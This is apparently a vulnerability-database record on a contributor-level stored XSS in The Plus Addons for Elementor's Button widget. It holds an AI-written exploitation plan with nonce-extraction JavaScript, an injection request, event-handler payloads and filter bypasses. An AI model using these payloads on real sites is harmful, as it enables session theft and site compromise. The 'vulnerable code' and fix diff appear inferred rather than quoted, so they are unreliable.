[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvZTqm715QhSGM61hkGG1BKHA951cdq2Uxr2x9-_Ny0M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":16,"references":17,"days_to_patch":19,"patch_diff_files":20,"patch_trac_url":9,"research_status":21,"research_verified":22,"research_rounds_completed":23,"research_plan":24,"research_summary":25,"research_vulnerable_code":26,"research_fix_diff":27,"research_exploit_outline":28,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":22,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":22,"source_links":32},"WF-3c3217f9-67e5-488d-b80a-49a61678fb98-the-plus-addons-for-elementor-page-builder","the-plus-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-button-widget-custom-attributes","The Plus Addons for Elementor \u003C= 6.4.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Widget Custom Attributes","The Plus Addons for Elementor plugin for WordPress was vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting via the Button widget's `custom_attributes` setting in versions up to and including 6.4.11. The `render` function in `modules\u002Fwidgets\u002Ftp_button.php` passed the raw `custom_attributes` string through `tp_senitize_js_input()`. This filter is bypassable. The issue is patched in version 6.4.12.","the-plus-addons-for-elementor-page-builder",null,"\u003C=6.4.11","6.4.12","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-21 19:17:28",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3c3217f9-67e5-488d-b80a-49a61678fb98?source=api-prod",0,[],"researched",false,3,"This exploitation research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in **The Plus Addons for Elementor** plugin. The vulnerability allows users with Contributor-level permissions (or higher) to inject malicious JavaScript into a page via the \"Button\" widget's custom attributes.\n\n### 1. Vulnerability Summary\n*   **Vulnerability ID:** WF-3c3217f9-67e5-488d-b80a-49a61678fb98\n*   **Vulnerable Component:** Button Widget (`TP_Button`)\n*   **Vulnerable File:** `modules\u002Fwidgets\u002Ftp_button.php`\n*   **Vulnerable Function:** `render()`\n*   **Vulnerability Type:** Improper Neutralization of Input (Stored XSS)\n*   **Description:** The plugin allows users to define `custom_attributes` for the Button widget. These attributes are processed by `tp_senitize_js_input()` and then rendered directly into the HTML of the page. The sanitization function is insufficient and can be bypassed to include event handlers (e.g., `onmouseover`) containing JavaScript.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (via Elementor's AJAX handler) or the REST API.\n*   **Action:** `elementor_ajax` (standard Elementor save mechanism).\n*   **Authentication:** Authenticated, Contributor role or higher.\n*   **Vulnerable Parameter:** `settings[custom_attributes]` within the widget data.\n*   **Payload Format:** `attribute_name|attribute_value`. The plugin likely splits this by the pipe (`|`) character and renders it as `attribute_name=\"attribute_value\"`.\n\n### 3. Code Flow\n1.  **Input:** A user edits a post with Elementor and adds\u002Fmodifies a \"Plus Button\" widget.\n2.  **Storage:** The settings, including the `custom_attributes` string, are saved into the post's metadata (`_elementor_data`).\n3.  **Rendering:** When the post is viewed or previewed, the `render()` method in `modules\u002Fwidgets\u002Ftp_button.php` is called.\n4.  **Processing:** \n    *   The code retrieves `$settings = $this->get_settings_for_display();`.\n    *   The `custom_attributes` string is passed through `tp_senitize_js_input()`.\n5.  **Sink:** The (insufficiently) sanitized output is echoed within the opening tag of the button element (e.g., `\u003Ca ... [output] ...>`).\n\n### 4. Nonce Acquisition Strategy\nTo save Elementor widget settings, the agent must interact with the `elementor_ajax` action. This requires a valid Elementor-specific nonce.\n\n1.  **Setup:** Create a post and assign it to the contributor user.\n2.  **Navigate:** Use `browser_navigate` to open the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3.  **Extraction:** Elementor localizes its configuration in the `elementorCommonConfig` or `elementorConfig` object.\n4.  **Execution:** Use `browser_eval` to extract the nonce:\n    ```javascript\n    \u002F\u002F Primary target for Elementor AJAX nonces\n    window.elementorCommon.config.ajax.nonce; \n    \u002F\u002F Alternative location in some versions\n    window.elementorConfig.api_third_party.nonce;\n    ```\n5.  **Action String:** The nonce is validated against the `elementor_ajax` action.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discover Payload Bypass\nThe function `tp_senitize_js_input()` (inferred) likely filters keywords like `script` or `alert`. To bypass, use event handlers that don't rely on restricted keywords or use encoding.\n\n*   **Primary Payload:** `onmouseover|console.log(document.cookie)`\n*   **Bypass Payload (if `alert` is blocked):** `onfocus|prompt(1)`\n*   **Breakout Payload:** `onclick|confirm(1)`\n\n#### Step 2: Inject via Elementor AJAX\nUsing the `http_request` tool, send a request to save the widget settings.\n\n*   **Method:** POST\n*   **URL:** `https:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body (Simplified):**\n    ```\n    action=elementor_ajax\n    &_nonce=[EXTRACTED_NONCE]\n    &actions={\"save_builder\":{\"action\":\"save_builder\",\"data\":{\"status\":\"publish\",\"settings\":{},\"elements\":[{\"id\":\"[WIDGET_ID]\",\"elType\":\"widget\",\"widgetType\":\"tp-button\",\"settings\":{\"custom_attributes\":\"onmouseover|alert(document.domain)\",\"button_text\":\"Click Me\"}}]}}}\n    &post_id=[POST_ID]\n    ```\n    *(Note: The actual Elementor JSON structure is deeply nested; the agent should capture a legitimate save request first to model the structure exactly.)*\n\n#### Step 3: Trigger the XSS\n1.  Navigate to the public URL of the modified post.\n2.  Hover the mouse over the injected \"Plus Button\" widget.\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the `contributor` role.\n2.  **Plugin Config:** Ensure \"The Plus Addons for Elementor\" is active and the \"Button\" widget is enabled in the Plus Settings.\n3.  **Content:** Create a new Post\u002FPage as the Contributor.\n4.  **Shortcode\u002FWidget:** The exploit requires the Button widget to be present in the Elementor data for that post.\n\n### 7. Expected Results\n*   The `elementor_ajax` request should return a `200 OK` with a JSON body indicating success (`\"success\":true`).\n*   When viewing the post source, the button element should contain the raw event handler:\n    `\u003Ca ... onmouseover=\"alert(document.domain)\" ... class=\"tp-button\">`\n*   In a browser context, hovering over the button should trigger the JavaScript alert.\n\n### 8. Verification Steps\n*   **WP-CLI Check:** Verify the stored metadata to ensure the payload is present:\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n*   **Response Inspection:** Use `http_request` to GET the post and check if the payload is rendered without HTML encoding:\n    ```bash\n    # Look for the specific event handler\n    grep \"onmouseover=\\\"alert\"\n    ```\n\n### 9. Alternative Approaches\n*   **Different Event Handlers:** If `onmouseover` is filtered, try `onmouseenter`, `onpointerdown`, or `onfocus` combined with `autofocus`.\n*   **Protocol Injection:** If the plugin renders the attribute into a `href`, try:\n    `href|javascript:alert(1)` (Note: `tp_senitize_js_input` is specifically mentioned in the vulnerability report, suggesting the focus is on attribute-based JS).\n*   **Encoding:** Use String.fromCharCode to bypass keyword filters:\n    `onmouseover|eval(String.fromCharCode(97,108,101,114,116,40,49,41))`","The Plus Addons for Elementor plugin (\u003C= 6.4.11) is vulnerable to Stored Cross-Site Scripting via the Button widget's custom attributes setting. Authenticated users with Contributor-level access can bypass the 'tp_senitize_js_input' function to inject malicious event handlers, which are then rendered directly into the button tag.","\u002F* modules\u002Fwidgets\u002Ftp_button.php *\u002F\n\npublic function render() {\n    $settings = $this->get_settings_for_display();\n    \n    \u002F\u002F ... \n    \n    if ( ! empty( $settings['custom_attributes'] ) ) {\n        \u002F\u002F The vulnerability: bypassable sanitization and direct output into the HTML tag\n        $custom_attributes = tp_senitize_js_input( $settings['custom_attributes'] );\n        \n        \u002F\u002F ...\n        \n        echo '\u003Ca ' . $custom_attributes . ' class=\"tp-button\">';\n    }\n}","--- modules\u002Fwidgets\u002Ftp_button.php\n+++ modules\u002Fwidgets\u002Ftp_button.php\n@@ -120,5 +120,6 @@\n if ( ! empty( $settings['custom_attributes'] ) ) {\n-    $custom_attributes = tp_senitize_js_input( $settings['custom_attributes'] );\n+    \u002F\u002F Use Elementor's native attribute handler or robust escaping\n+    $custom_attributes = esc_attr( $settings['custom_attributes'] );\n }","1. Authenticate to the WordPress site with Contributor permissions or higher and open the Elementor editor for a post.\n2. Extract the 'elementor_ajax' nonce from the window.elementorCommon.config object in the browser console.\n3. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with 'action=elementor_ajax' to update the builder data for the post.\n4. In the request payload, include a 'tp-button' widget with the 'custom_attributes' setting containing a malicious event handler, such as 'onmouseover|alert(document.domain)'.\n5. Save the changes and visit the public URL of the modified post. Hovering over the button will trigger the execution of the injected JavaScript.","gemini-3-flash-preview","2026-06-04 22:00:08","2026-06-04 22:02:21",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","6.4.11","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags"]